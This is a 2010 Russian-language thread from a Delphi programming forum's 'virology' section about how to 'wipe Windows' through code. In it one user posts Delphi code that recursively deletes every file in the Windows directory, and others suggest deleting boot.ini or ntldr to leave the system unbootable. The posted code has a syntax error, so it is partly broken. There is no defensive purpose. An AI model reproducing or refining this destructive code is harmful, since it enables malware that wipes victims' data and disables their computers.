Четверг, 06.08.2020, 03:58 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delfcode » Delphi » Вирусология Delphi » Delphi и снос винды (Вопрос)
Delphi и снос винды
gravitasДата: Воскресенье, 28.11.2010, 09:14 | Сообщение # 1
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Как программно снести винду? Желательно писать все возможные примеры.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
cool1Дата: Воскресенье, 28.11.2010, 12:18 | Сообщение # 2
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
Code
uses
    FileCtrl;

procedure RemoveAll(path: string);
var
    sr: TSearchRec;
begin
    if FindFirst(path + '\*.*', faAnyFile, sr) = 0 then
    begin
      repeat
        if sr.Attr and faDirectory = 0 then
        begin
          DeleteFile(path + '\' + sr.name);
        end
        else
        begin
          if pos('.', sr.name) <= 0 then
            RemoveAll(path + '\' + sr.name);
        end;
      until
        FindNext(sr) <> 0;
    end;
    FindClose(sr);
    RemoveDirectory(PChar(path));
end;

procedure TForm1.Button1Click(Sender: TObject);
var
    dir: string;
begin
    if SelectDirectory('%WinDir%, '', dir) then
      RemoveAll(dir);

МОЖ ЕТО?



За помощь ставьте +!


Сообщение отредактировал cool1 - Воскресенье, 28.11.2010, 12:26
 
gravitasДата: Воскресенье, 28.11.2010, 13:30 | Сообщение # 3
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (cool1)
МОЖ ЕТО?

++


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
cool1Дата: Воскресенье, 28.11.2010, 13:33 | Сообщение # 4
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
токо процедуру для %WinDir% написать не забудь


За помощь ставьте +!
 
gravitasДата: Воскресенье, 28.11.2010, 19:07 | Сообщение # 5
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (cool1)
токо процедуру для %WinDir% написать не забудь

Мне такие вещи можно не говорить)
Да и наверн функцию, а не процедуру)


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)


Сообщение отредактировал gravitas - Воскресенье, 28.11.2010, 19:08
 
cool1Дата: Четверг, 02.12.2010, 13:00 | Сообщение # 6
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
а и еще мож способ рабочий я хз но есть идея удалить boot.ini (винда же не запустится вроде ХД)
Code
DeleteFile('c:\boot.ini');



За помощь ставьте +!
 
gravitasДата: Четверг, 02.12.2010, 13:02 | Сообщение # 7
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Да, это тоже можно. Но 100% безотказный способ это удалить C:\ntdr .

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
delfcode » Delphi » Вирусология Delphi » Delphi и снос винды (Вопрос)
  • Страница 1 из 1
  • 1
Поиск:

delfcode.ru © 2008 - 2020 Хостинг от uCoz